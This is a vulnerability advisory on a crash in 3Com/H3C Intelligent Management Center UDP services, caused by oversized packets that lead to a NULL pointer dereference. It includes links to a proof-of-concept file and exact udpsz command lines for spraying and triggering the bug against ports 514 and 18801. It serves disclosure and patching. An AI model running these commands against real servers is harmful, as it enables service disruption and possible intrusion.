#######################################################################

                             Luigi Auriemma

Application:  3com / H3C Intelligent Management Center (IMC)
              http://www.3com.com/IMC_Enterprise/
Versions:     <= 3.3 SP2 R2606P13
Platforms:    Windows, Linux, Solaris
Bug:          unknown problem in ACE_OS::exit
Exploitation: remote, versus server
Date:         probably found 19 Oct 2010
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


"3ComŽ Intelligent Management Center (IMC) Enterprise Edition is a
self-contained comprehensive management solution, flexible and scalable
enough to meet the needs of advanced Enterprise networks."
The suite is also known under the vendors HP and H3C (the original
developer).


#######################################################################

======
2) Bug
======


imcsyslogdm.exe is a syslog daemon running on the UDP ports 514 and
515, while receiver.exe and processor.exe run on UDP ports 18801 and
18802.
All these components are not deployed by default in IMC.

The problem is in how the services react to the socket errors (-1
returned by recvfrom) caused by packets bigger than 2048 bytes.
They try to exit by calling ACE_OS::exit but after a NULL pointer
dereference (EAX+14) the code flow moves on some zones of the heap
memory where are also sprayed parts of data received in the previous
packets.

I don't have additional details so I can't confirm the code execution
that could be not so trivial.

The problem happens also with receiver.exe and processor.exe but they
seem less exploitable.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip
http://aluigi.org/poc/imc_8.dat

  udpsz -f imc_8.dat -l 10 SERVER 514 -1
after 10 seconds stop it and use:
  udpsz SERVER 514 2049

while for testing receiver.exe or processor.exe:
  udpsz -l 10 -X 0x16 8 l 0 -H md5 4 0 0 silhouette -C "000ad8a7 00000000000000000000000000000000 ffff 32 04 01 01" SERVER 18801 0x1400


#######################################################################

======
4) Fix
======


http://www.zerodayinitiative.com/advisories/ZDI-11-166


#######################################################################